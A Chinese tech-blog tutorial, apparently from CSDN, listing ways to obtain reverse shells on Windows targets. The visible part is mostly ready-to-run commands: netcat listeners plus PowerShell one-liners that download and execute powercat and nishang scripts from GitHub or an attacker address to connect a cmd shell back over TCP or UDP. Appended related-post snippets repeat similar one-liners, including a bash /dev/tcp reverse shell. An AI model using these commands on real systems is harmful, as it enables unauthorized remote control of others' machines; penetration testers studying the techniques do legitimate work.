Windows下反弹shell的方法

最新推荐文章于 2025-03-13 17:37:44 发布
最新推荐文章于 2025-03-13 17:37:44 发布
阅读量1.3w 收藏 33
点赞数 6
分类专栏: 内网渗透 文章标签: windows 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39101049/article/details/96191861
版权
本文详细介绍了在Windows环境下使用各种工具和技术进行反弹shell的方法,包括powercat、nishang、Reverse UDP和ICMP shell、自定义powershell函数、dnscat2、Empire结合Office、OLE对象插入bat文件、PowerSploit DLL注入、metasploit和Cobalt strike等,覆盖了TCP、UDP、DNS和ICMP等多种协议的反弹shell技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.powercat反弹shell

powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat

首先攻击者开启监听

nc -lvp 6666

或者使用powercat监听

powercat -l -p 6666

接着在目标机上反弹cmd shell:

powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 192.168.159.134 -p 6666 -e cmd

2.nishang反弹shell

Nishang(https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架,集合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell

Reverse TCP shell
攻击者(192.168.159.134)开启监听:

nc -lvp 6666

目标机执行:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com
/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.159.134 -port 6666

或者将nishang下载到攻击者本地:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.159.134 -port 6666

3.Reverse UDP shell

攻击者(192.168.159.134)开启监听:

nc -lvup 53

目标机执行:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellUdp.ps1');
Invoke-PowerShellUdp -Reverse -IPAddress 192.168.159.134 -port 53
最低0.47元/天 解锁文章
Windows反弹shell乱码
墨痕诉清风的博客
04-06 997
Windows反弹shell乱码
简单易上手!Windows反弹shell实现
weixin_54475173的博客
01-02 581
Windows反弹shell
Windows反弹Shell
qq_62073002的博客
04-26 1239
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
Windows反弹shell的方式
ws1813004226的博客
05-25 8392
一、Windows反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
【渗透测试】反弹 Shell 技术详解(二)
最新发布
SunnyCat
03-13 698
通过伪终端中转与通过管道等中转原理一样,但通过伪终端中转的检测难度大大提升,单从Shell的标准输入输出来看,和正常打开的终端没有什么区别。通过跟踪FD(文件描述符File Descriptor)和进程的关系可以检测该数据通道,判断是否为bash进程,获取bash父进程的/proc/[pid]/fd,判断是否有存在fd重定向到pipe或者socket情况。:这类反弹Shell的检测可以通过检测Shell的标准输入、标准输出是否被重定向到Socket或检测一些简单的主机网络日志特征来实现。
Windows 反弹shell方法
weixin_53747497的博客
07-12 3361
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
windows 反弹shell_反弹shell的N种姿势
weixin_39622710的博客
12-08 944
0x00 前言在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一攻击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev...
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2223
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
Windows反弹shell测试
oscarli的博客
05-30 412
windows反弹shell测试记录
window反弹shell
mingyqf的博客
02-16 1251
1.nc反弹shell 远程服务器 nc 监听命令 nc -vlnp 8080 受害者反弹 shell 命令,每种语言都有 sock 连接命令,可以根据不通过的环境,选择合适的命令。 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 2.powershell反弹cmd powercat是netcat的powershell版本 所以可以放在可被访问的远程服务器上。执行命令的时候,自动下载执行。 http://192.168.0.195/powercat
反弹shell命令
Shanfenglan's blog
10-29 2745
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
反弹shell的命令大全
G3et的博客
03-21 1023
【代码】反弹shell的命令大全。
cmd 返回值_渗透不会反弹shell?来教你写一个cmdshell
weixin_39756235的博客
11-20 162
原创 lengyi 合天智汇包含的库:#include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <iostream> #include <string> #pragma comment(lib, "Ws2_32.lib") #define DEFA...
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3872
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
反弹shell后上传文件
技术超强的网络安全平台
12-10 1544
转载于:https://www.freebuf.com/articles/system/178515.html 在本文中,我将介绍一款自己编写的小工具NcPutter,并用它来实现在只有bash反弹shell情况下的文件上传。在渗透测试过程中,我们可能会遇到这样一种情景,即已将让目标机通过bash反弹shell与我们的机器建立了连接,需要向目标机上上传木马或其他可执行文件来做进一步提权或进行内网渗透,很多人可能会采用在目标机上执行wget、ftp、curl、nc等工具命令获取相关可执行文件,可这些方法有以下
windows 反弹shell_原创干货 | windows反弹shell小结
weixin_39533896的博客
11-19 1192
前言本文是att&ck Command-Line Interface的展开篇平时遇到rce的漏洞,我们通常会弹一个shell给自己,(提权,内网渗透,搭建跳板,等等)linux反弹shell得益于命令行特别友好,所以我们可以非常简单地就可以把shell弹出来,比如使用bash,perl,python,nc,获得shell的原理其实就是建立了一个socket通道,那么今天我们来看看...
利用window自带的程序进行反弹shell——cdb,regsvr
渗透测试
08-31 893
windows的system文件夹下有一个regsvr32.exe的程序,它就是windows自带的activex注册和反注册工具。(activex不注册是不能够被系统识别和使用的,一般安装程序都会自动地把它所使用的activex控件注册)。Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。......
shell 工具_黑客工具:大小仅30K,网络探测端口扫描shell反弹!速来补习
weixin_39952182的博客
12-05 157
前言小助手今天说的这个工具,是Linux下网络探测必备,在故障排查,远程连接中,简单方便,配上管道符操作,可以组装成强大的功能。他就是 Nmap 工具包内的 Ncat。介绍Netcat是用于跨TCP和UDP端口读写数据的实用程序。它可以用来做很多很酷的事情,比如文件传输,端口扫描,端口重定向,回溯别人的电脑,制作一个简单的聊天程序,用于网络故障排除等等,这就是为什么它被称为瑞士军刀。此外,现在几乎...
反弹Shell方法论,Windows
大河之犬的博客
10-10 1621
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
windows反弹shell方法
09-21
Windows反弹shell有多种方法,其中包括Powercat反弹shell、Nishang反弹shell和使用邮件地址作为反弹shell的服务器地址。 Powercat反弹shell是一种通过PowerShell实现的方法。攻击者可以在目标机器的cmd中执行命令,通过下载Powercat脚本并使用它来建立反弹shell连接。具体的命令如下: ```powershell powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1');powercat -c 192.168.110.128 -p 6677 -e cmd ``` Nishang反弹shell是另一种常用的方法。它提供了一组用于渗透测试的PowerShell脚本,其中包括反弹shell的功能。攻击者可以使用Nishang脚本来建立反弹shell连接。 另外,还可以使用邮件地址作为反弹shell的服务器地址。这种方法适用于Windows系统,可以在编译时选择隐藏弹出窗口。具体实现的细节需要根据具体情况进行进一步研究。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值